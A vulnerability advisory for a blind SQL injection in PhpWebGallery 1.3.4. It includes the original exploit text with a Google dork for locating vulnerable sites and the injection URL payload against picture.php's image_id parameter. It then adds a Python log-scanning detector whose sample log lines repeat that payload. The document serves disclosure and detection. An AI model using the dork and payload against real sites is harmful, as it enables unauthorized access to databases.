Vendor: PhpWebGallery
By: Stack
CVSS: 7.5 HIGH
Blind SQL Injection
CWE: 89
Product Name: PhpWebGallery
Affected Version From: 1.3.2004
Affected Version To: 1.3.2004
Patch Exists: YES
Related CWE: N/A
CPE: a:phpwebgallery:phpwebgallery:1.3.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PhpWebGallery 1.3.4

A blind SQL injection vulnerability exists in PhpWebGallery 1.3.4. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database.

Mitigation:

Upgrade to the latest version of PhpWebGallery.

Exploit-DB raw data:

----------------------------------------------------------------
Script : PhpWebGallery 1.3.4
Type : Vulnerabilities (blind sql injection)
Author : Stack
Google Dork : inurl:"picture.php?cat=" "Powered by PhpWebGallery 1.3.4"
----------------------------------------------------------------
Download From : http://puzzle.dl.sourceforge.net/sourceforge/phpwebgallery/phpwebgallery-1.3.4.tar.bz2
----------------------------------------------------------------
waiting the demo exploit
----------------------------------------------------------------
Exploit :
http://site.il/phpwebgallery/picture.php?cat=[Real id]&image_id=[Real id]+and+substring(@@version,1,1)=5
Example :
http://site.il/phpwebgallery/picture.php?cat=3&image_id=76+and+substring(@@version,1,1)=5

# milw0rm.com [2008-09-11]
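
A detection check built on the request shape shown in the advisory above, as an added example that is not part of the original advisory or of PhpWebGallery's code: it scans web-server access logs for picture.php requests whose cat or image_id value is not a plain integer. The combined log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory shows being sent to picture.php; legitimate
# values are numeric ids ("[Real id]" in the advisory).
ID_PARAMS = ("cat", "image_id")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(request_target):
    """Return {param: decoded_value} for id parameters that are not plain integers."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/picture.php"):
        return {}
    # parse_qs decodes both "+" and "%20", so encoded variants are normalised.
    query = parse_qs(parts.query, keep_blank_values=True)
    bad = {}
    for name in ID_PARAMS:
        for value in query.get(name, []):
            if not re.fullmatch(r"\d+", value):
                bad[name] = value
    return bad


def scan(log_lines):
    """Return [(line_number, findings)] for requests carrying a non-numeric id."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if m:
            found = suspicious_params(m.group(1))
            if found:
                hits.append((n, found))
    return hits


# Constructed sample log lines (assumed combined log format), not real traffic.
# Line 4 targets a different script, so it is out of scope for this check.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Sep/2008:10:00:01 +0000] "GET /phpwebgallery/picture.php?cat=3&image_id=76 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [11/Sep/2008:10:00:07 +0000] "GET /phpwebgallery/picture.php?cat=3&image_id=76+and+substring(@@version,1,1)=5 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [11/Sep/2008:10:00:09 +0000] "GET /phpwebgallery/picture.php?cat=3&image_id=76%20and%20substring(@@version,1,1)=5 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [11/Sep/2008:10:00:12 +0000] "GET /phpwebgallery/category.php?cat=fav HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for n, found in scan(SAMPLE_LOG):
        print(f"line {n}: non-numeric id parameter(s): {found}")
```

The same integer-only rule is what an input filter or WAF rule in front of an unpatched install would enforce for these two parameters.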